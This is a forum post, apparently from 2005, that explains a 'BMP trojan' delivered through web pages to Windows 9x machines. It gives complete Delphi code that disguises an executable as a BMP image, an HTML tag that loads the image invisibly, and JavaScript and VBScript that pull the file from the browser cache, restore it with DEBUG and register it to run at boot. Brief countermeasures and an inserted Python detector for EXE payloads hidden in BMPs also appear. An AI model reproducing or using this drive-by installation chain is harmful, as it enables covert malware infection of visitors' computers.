
Image Trojans: A Complete Analysis

鞠中山 | Posted 2005-8-23 06:09:45 | from Weifang, Shandong, China

What is a BMP web trojan? It is different from the long worn-out MIME-header-vulnerability trojans: a MIME trojan MIME-encodes an EXE file into an EML (Outlook Express mail) file, puts it on a web page and abuses the decoding flaw in IE and OE to download and execute it automatically.

A BMP trojan works differently. It disguises an EXE file as a BMP image so that IE downloads it automatically; a JavaScript on the page then searches the client's Temporary Internet Files folder, finds the downloaded BMP and copies it to the TEMP directory. A further script restores the found BMP to an EXE with DEBUG and registers it under the registry Run key so that it executes at the next boot. This technique only works under Windows 9x; against 2000 and XP it is powerless.

It looks complicated, so let's go through it step by step:
1) Turning an EXE into a BMP.
Look up the BMP file format and you will see that the BMP file header is 54 bytes long; in short it holds the image width and height, bit depth, file size and length of the data area. All we need to do is prepend a matching BMP header to the EXE file (the values in the header must of course agree with the size of the EXE) and IE can be fooled into downloading that "BMP". We first experimented with JPG files and found that IE will not download the file if the header is not correct. The conversion code follows:
program exe2bmp;

uses
  Windows,
  SysUtils;

var
  len, row, col, fs: DWORD;
  buffer: array[0..255] of char;
  fd: WIN32_FIND_DATA;
  h, hw: THandle;

begin
  if (ParamStr(1) <> '') and (ParamStr(2) <> '') then begin // exit unless run with two parameters
    if FileExists(ParamStr(1)) then begin
      FindFirstFile(PChar(ParamStr(1)), fd);
      fs := fd.nFileSizeLow;
      { pick width (col) and height (row) such that row*col*3 = len, len = fs rounded up to a multiple of 12 }
      col := 4;
      while true do begin
        if (fs mod 12) = 0 then begin
          len := fs;
        end else len := fs + 12 - (fs mod 12);
        row := len div col div 3;
        if row > col then begin
          col := col + 4;
        end else Break;
      end;
      FillChar(buffer, 256, 0);
      { the BMP file header data follows }
      buffer[0] := 'B'; buffer[1] := 'M';
      PDWORD(@buffer[18])^ := col;      // image width
      PDWORD(@buffer[22])^ := row;      // image height
      PDWORD(@buffer[34])^ := len;      // size of pixel data
      PDWORD(@buffer[2])^ := len + 54;  // total file size
      PDWORD(@buffer[10])^ := 54;       // offset of pixel data
      PDWORD(@buffer[14])^ := 40;       // size of BITMAPINFOHEADER
      PWORD(@buffer[26])^ := 1;         // colour planes
      PWORD(@buffer[28])^ := 24;        // bits per pixel
      { write the file }
      hw := CreateFile(PChar(ParamStr(2)), GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, CREATE_ALWAYS, 0, 0);
      h := CreateFile(PChar(ParamStr(1)), GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
      WriteFile(hw, buffer, 54, col, nil);   // col is reused as the bytes-written counter from here on
      repeat
        ReadFile(h, buffer, 256, col, nil);
        WriteFile(hw, buffer, col, col, nil);
      until col <> 256;
      WriteFile(hw, buffer, len - fs, col, nil);  // pad the data area up to len bytes
      CloseHandle(h);
      CloseHandle(hw);
    end;
  end;
end.
The code above compiles under Delphi 4, 5 and 6 and yields exe2bmp.exe. Open an MS-DOS prompt and enter
exe2bmp myexe.exe mybmp.bmp
and press Enter: the EXE named by the first parameter is converted into BMP format and written to the file named by the second parameter.
Next the BMP is placed on a web page. If you have opened the image you will have noticed that it looks garbled and monotone in colour, so on the page it is best referenced like this:
<img src="mybmp.bmp" height="0" width="0">
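From the defender's side, a file produced this way is structurally a valid BMP whose "pixel data" is a DOS/PE executable. The following inspection routine, added here as an example (not code from the original post), parses the 54-byte header described above, checks its internal consistency, and flags pixel data that begins with an MZ header and carries a PE signature; the two sample blobs are constructed inline and the PE stub is fake, not a real executable.

```python
import struct
from typing import List

BMP_HEADER_LEN = 54  # BITMAPFILEHEADER (14) + BITMAPINFOHEADER (40)


def inspect_bmp(data: bytes) -> List[str]:
    """Return findings for a BMP blob; an empty list means nothing suspicious."""
    findings: List[str] = []
    if len(data) < BMP_HEADER_LEN or data[:2] != b"BM":
        return ["not a BMP (missing 'BM' magic or header too short)"]
    file_size, _, _, data_offset = struct.unpack_from("<IHHI", data, 2)
    _, width, height, _, bpp, compression, img_size = struct.unpack_from("<IiiHHII", data, 14)
    if file_size != len(data):
        findings.append(f"header file size {file_size} != actual size {len(data)}")
    row_bytes = (abs(width) * bpp // 8 + 3) & ~3  # uncompressed rows are padded to 4 bytes
    expected = row_bytes * abs(height)
    if compression == 0 and img_size not in (0, expected):
        findings.append(f"image size {img_size} != {expected} implied by {width}x{height}@{bpp}bpp")
    pixels = data[data_offset:]
    # The tell-tale sign of the exe2bmp trick: the "pixel data" is a DOS/PE executable.
    if pixels[:2] == b"MZ":
        findings.append("pixel data begins with an MZ (DOS/PE) header")
        if len(pixels) >= 64:
            e_lfanew = struct.unpack_from("<I", pixels, 60)[0]  # offset of the PE header
            if pixels[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
                findings.append(f"PE signature at pixel-data offset {e_lfanew:#x}")
    return findings


def _bmp(width: int, height: int, pixels: bytes) -> bytes:
    """Constructed 24-bpp BMP wrapped around a pixel area (sample data for the checks above)."""
    file_hdr = struct.pack("<2sIHHI", b"BM", BMP_HEADER_LEN + len(pixels), 0, 0, BMP_HEADER_LEN)
    info_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(pixels), 0, 0, 0, 0)
    return file_hdr + info_hdr + pixels


# Constructed samples: a benign 1x1 white pixel, and an "image" whose pixel area is a
# fake MZ/PE stub (not a real executable) sized the way the converter above would size it.
BENIGN = _bmp(1, 1, b"\xff\xff\xff\x00")
FAKE_PE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x90" * 28
DISGUISED = _bmp(8, 4, FAKE_PE)  # 8 * 4 * 3 = 96 bytes = len(FAKE_PE)

if __name__ == "__main__":
    for name, blob in (("benign.bmp", BENIGN), ("mybmp.bmp", DISGUISED)):
        print(name, inspect_bmp(blob) or ["clean"])
```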
The script placed on the web page follows:
document.write(' ');
function docsave()
{
  a=document.applets[0];
  a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
  a.createInstance();
  wsh=a.GetObject();
  a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
  a.createInstance();
  fso=a.GetObject();
  var winsys=fso.GetSpecialFolder(1);
  var vbs=winsys+'\\s.vbs';
  wsh.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'" ');
  var st=fso.CreateTextFile(vbs,true);
  st.WriteLine('Option Explicit');
  st.WriteLine('Dim FSO,WSH,CACHE,str');
  st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")');
  st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
  st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")');
  st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")');
  st.WriteLine('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"');
  st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"');
  st.WriteLine('WScript.Quit()');
  st.WriteLine('Function SearchBMPFile(Folder,fname)');
  st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');
  st.WriteLine(' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname');
  st.WriteLine(' if FSO.FileExists(str) then');
  st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
  st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
  st.WriteLine(' set File=FSO.GetFile(str)');
  st.WriteLine(' File.Copy(tmp & "tmp.dat")');
  st.WriteLine(' File.Delete');
  st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');
  st.WriteLine(' Lt.WriteLine("rbx")');
  st.WriteLine(' Lt.WriteLine("0")');
  st.WriteLine(' Lt.WriteLine("rcx")');
  st.WriteLine(' Lt.WriteLine("1000")');
  st.WriteLine(' Lt.WriteLine("w136")');
  st.WriteLine(' Lt.WriteLine("q")');
  st.WriteLine(' Lt.Close');
  st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
  st.WriteLine(' On Error Resume Next ');
  st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');
  st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
  st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');
  st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
  st.WriteLine(' end if');
  st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
  st.WriteLine(' For Each SubFolder In Folder.SubFolders');
  st.WriteLine(' SearchBMPFile SubFolder,fname');
  st.WriteLine(' Next');
  st.WriteLine(' End If');
  st.WriteLine('End Function');
  st.Close();
}
setTimeout('docsave()',1000);
Save this script as "js.js" and insert it into the page with:
<script src="js.js"></script>

This script mainly generates an "S.VBS" file in the local machine's SYSTEM directory; that script file runs automatically at the next boot and its main job is to locate mybmp[1].bmp in the temporary (cache) directory.
The main content of "S.VBS" is as follows:
Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
  Dim SubFolder,File,Lt,tmp,winsys
  ' Look for the target BMP image in the temporary (cache) folder
  str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
  if FSO.FileExists(str) then
    tmp=fso.GetSpecialFolder(2) & "\"
    winsys=fso.GetSpecialFolder(1) & "\"
    set File=FSO.GetFile(str)
    File.Copy(tmp & "tmp.dat")
    File.Delete
    ' Generate a DEBUG script
    set Lt=FSO.CreateTextFile(tmp & "tmp.in")
    Lt.WriteLine("rbx")
    Lt.WriteLine("0")
    Lt.WriteLine("rcx")
    ' The 1000 on the next line is hexadecimal, 4096 in decimal (this number is the size of your EXE file)
    Lt.WriteLine("1000")
    ' w136 writes BX:CX bytes starting at offset 136h, i.e. 36h = 54 bytes past the 100h load address, skipping the BMP header
    Lt.WriteLine("w136")
    Lt.WriteLine("q")
    Lt.Close
    WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6
    On Error Resume Next
    FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
    FSO.GetFile(tmp & "tmp.dat").Delete
    FSO.GetFile(tmp & "tmp.in").Delete
    FSO.GetFile(tmp & "tmp.out").Delete
  end if
  If Folder.SubFolders.Count <> 0 Then
    For Each SubFolder In Folder.SubFolders
      SearchBMPFile SubFolder,fname
    Next
  End If
End Function
Countermeasures:
The simplest: delete or rename wscript.exe and the DEBUG program;
install an effective antivirus product, since many antivirus products can already detect these scripts;
where circumstances allow, install Win2K SP3, and try to avoid websites of unknown origin.
hefeng8012 | Posted 2005-8-23 13:23:26 | from Qingdao, Shandong, China
Classic!